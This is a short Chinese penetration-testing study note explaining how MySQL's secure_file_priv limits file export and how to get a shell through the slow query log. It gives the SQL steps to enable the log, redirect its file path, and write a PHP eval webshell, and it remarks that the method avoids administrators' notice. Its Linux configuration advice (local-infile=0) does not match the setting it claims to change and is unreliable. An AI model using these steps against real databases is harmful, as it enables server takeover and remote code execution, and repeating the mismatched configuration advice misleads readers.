渗透学习记录
本文参考自https://www.cnblogs.com/c1e4r/articles/8902444.html
secure_file_priv 为 NULL 时,表示限制mysqld不允许导入或导出。
secure_file_priv 为 /tmp 时,表示限制mysqld只能在/tmp目录中执行导入导出,其他目录不能执行。
secure_file_priv 没有值时,表示不限制mysqld在任意目录的导入导出。
在mysql 5.6.34版本以后 secure_file_priv的值默认为NULL,直接select into outfile会失败
只能够通过以下方式修改
windows下:
修改mysql.ini 文件,在[mysqld] 下添加条目: secure_file_priv =
保存,重启mysql。
Linux下:
在/etc/my.cnf的[mysqld]下面添加local-infile=0选项。
mysql也具有日志,我们也可以通过日志来getshell。
mysql日志主要包含:错误日志、查询日志、慢查询日志、事务日志
我们主要利用慢查询日志来写shell,步骤大致分为三步:
1.设置slow_query_log=1.即启用慢查询日志(默认禁用)。
show variables like ‘%slow_query_log%’;
1 | set global slow_query_log=1; |
2.伪造(修改)slow_query_log_file日志文件的绝对路径以及文件名
set global slow_query_log_file=’dir\filename’
3.向日志文件写入shell
1 | select '<?php eval($_POST[cmd]);?>' or sleep(13); |
执行成功
对慢查询日志的补充:
因为是用的慢查询日志,所以说只有当查询语句执行的时间要超过系统默认的时间时,该语句才会被记入进慢查询日志。
时间默认超过多少的称为慢查询日志?
一般都是通过long_query_time选项来设置这个时间值,时间以秒为单位,可以精确到微秒。如果查询时间超过了这个时间值(默认为10秒),这个查询语句将被记录到慢查询日志中。查看服务器默认时间值方式如下:
1 | show global variables like '%long_query_time%' |
通常情况下执行sql语句时的执行时间一般不会超过10s,所以说这个日志文件应该是比较小的,而且默认也是禁用状态,不会引起管理员的察觉。